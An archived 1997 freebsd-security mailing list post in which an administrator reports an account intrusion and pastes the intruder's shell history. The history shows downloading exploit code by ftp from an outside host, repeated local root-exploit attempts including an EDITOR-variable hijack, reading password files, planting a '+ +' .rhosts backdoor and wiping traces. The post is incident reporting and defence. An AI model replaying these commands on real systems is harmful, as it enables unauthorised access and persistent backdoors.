Skip site navigation (1)Skip section navigation (2)
Date:      Fri, 20 Jun 1997 10:33:14 -0600
From:      Sean Kelly <kelly@fsl.noaa.gov>
To:        freebsd-security@freebsd.org
Subject:   Attempt to compromise root
Message-ID:  <33AAB0CA.2781E494@fsl.noaa.gov>

next in thread | raw e-mail | index | archive | help
I'm running FreeBSD 2.2-RELEASE.

One of my users (okay, she's my wife) had submitted a crontab which had
a bad MAILTO line in it, resulting in a MAILER-DAEMON message being sent
to me every time the job was run ... and the job was set to run every
minute:

	* * * * * id

When I asked the her, she said she didn't know what a crontab file was. 
That's when I suspected foul play.  The wtmp indicated that she had
logged in from a remote site early in the morning when I *know* :-) she
was asleep.

Then we found the following in her .history file:

--------------------------------------------------------------------
rm *
ftp the.art.of.sekurity.org
more /etc/passwd
ls
cc -o gr1 bsd1.c
rm bsd1.c
rm gr1
cc -o gr1 bsd2.c
chmod 700 gr1
./gr1
./gr1 mary root
rm gr1
ls -al
cc -o gr bsd3.c
chmod 700 gr
./gr
ls
rm bsd2.c
rm bsd3.c
ls
rm gr
cc -o gr bsd4.c
ls -al
./gr
rm bsd4.c gr
cc -o gr bsd5.c
ls -al
./gr
id
rm gr
rm bsd5
rm bsd5.c
cc -o gr bsd6.c
./gr
rm bsd6.c
rm gr
ls -al
cc -o gr bsd7.c
ls -al
rm bsd7.c
ftp the.art.of.sekurity.org
ls
cc -o jump jump.c
ls -al
./jump
id
./jump
rm *
uname -a
cd /bin
ls -al | more
ls -al | grep wheel
cd ..
ls -al
cd etc
ls -al | more
more security
ls -al mast*
cd /
cat .rhosts
cd
cat .rhosts
ls -al
ls -al | grep drwx
telnet localhost 25
cd /tmp.tmp
cd /tmp/.tmp
ftp the.art.of.sekurity.org
ls -al
cc -o gr bsd1.c
more bsd1.c
rm gr
mv bsd1.c egg.c
cc -s -o /tmp/.tmp/egg -O egg.c
EDITOR='/tmp/.tmp/egg -1259' export EDITOR
EDITOR='/tmp/.tmp/egg -1259' e ; xport EDITOR
EDITOR='/tmp/.tmp/egg -1259' ; export EDITOR
more bsd1.c
ls -al
more egg.c
crontab -e
ls
more egg.c
EDITOR='/tmp/.tmp/egg -1259' ; export EDITOR
bash
whereis bash
/usr/ports/shells/bash
ls -al /usr/ports/shells/bash
/bin/sh
ls -al
rm egg*
pico bsd2.c
more bsd2.c
mv bsd2.c bsd.sh
./bsd.sh
chmod 700 bsd.sh
./bsd.sh
cd /tmp
ls sh*
cd .tmp
ls -al
rm bsd.sh
cp bsd.one bsd.c
vi bsd.c
ls
rm bsd.one
rm bsd.c
ls
cc -o gr bsd3.c
ls
rm bsd3.c
ftp the.art.of.sekurity.org
ls
tar xfv bsd.tar
mv grind.c ohjoy.c sploit ..
cd ..
chmod 700 sploit
chmod 644 *.c
./sploit
id
kill ^1
kill %1
rm ohj*
rm grind*
rm sploit*
ls
rmdir .tmp
cd
ls -al
rm -rf /tmp/.tmp
whereis larn
cd /tmp
mkdir tmp
cd tmp
ftp the.art.of.sekurity.org
ls
cc -o fuck bsd1.c
./fuck
ls
rm fuck
cc -o fuck bsd2.c
./fuck
rm fuck
cc -o fuck bsd3.c
ls
ls /usr/bin/crontab
ls -al /usr/bin/crontab
cc -o fuck bsd4.c
./fuck
./fuck lp1
./fuck bamboo
ls
rm fuck
more bsd1.sh
./bsd1.sh
chmod 700 bsd1.sh
./bsd1.sh
more bsd2.sh
chmod 700 bsd2.
chmod 700 bsd2.*
./bsd2.sh
ls -al
rm *
cd ..
rmdir .tmp
cd
rm -rf /tmp/tmp
cd /etc
cat hosts
cd /home
ls -al
cd rosemary/
ls
ls -al
find . -name .rhosts -print
ypcat passwd
w
cd /etc
more passwd
cd /u
ls -al
pwd
cd ..
ls
ls -al
echo "+ +" >> .rhosts
echo "+ +" > .rhosts
ls -al | more
exit
cd /home
ls
cd rosemary/
ls
ls -al
cd
ls -al | more
rm .history
exit
--------------------------------------------------------------------

Luckily, the idiot didn't realize that the .history file is updated
after logout, and we got a record of most of his/her activities.

I've tried ftp'ing to the.art.of.sekurity.org and have been successful
only once, but haven't been able to transfer any files.  sekurity.org
appears registered to a organization called "Insekurity, Inc.".

I checked config files, .rhosts, system binaries, and everything seems
intact, so I don't think root was compromised.  However, I don't have an
md5/mtree digest of everything so I'm not 100% sure.  Next I'll go back
to source media and do some comparisons.

So, two issues:

(1) Does this type of attack seem familiar?  Is anyone aware of
"sekurity.org" and what their purpose is?  Is there someone there to
whom I should complain?  (Doubtful, as it appears the reason that ftp
site exists is to provide a repository of cracking code.)

(2) Can we get an option during the FreeBSD install to generate the
md5/mtree digest?  Naturally, I read up on this feature after the
attack, but after an attack it's too late.

-- 
Sean Kelly
NOAA Forecast Systems Laboratory
Boulder Colorado USA



Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?33AAB0CA.2781E494>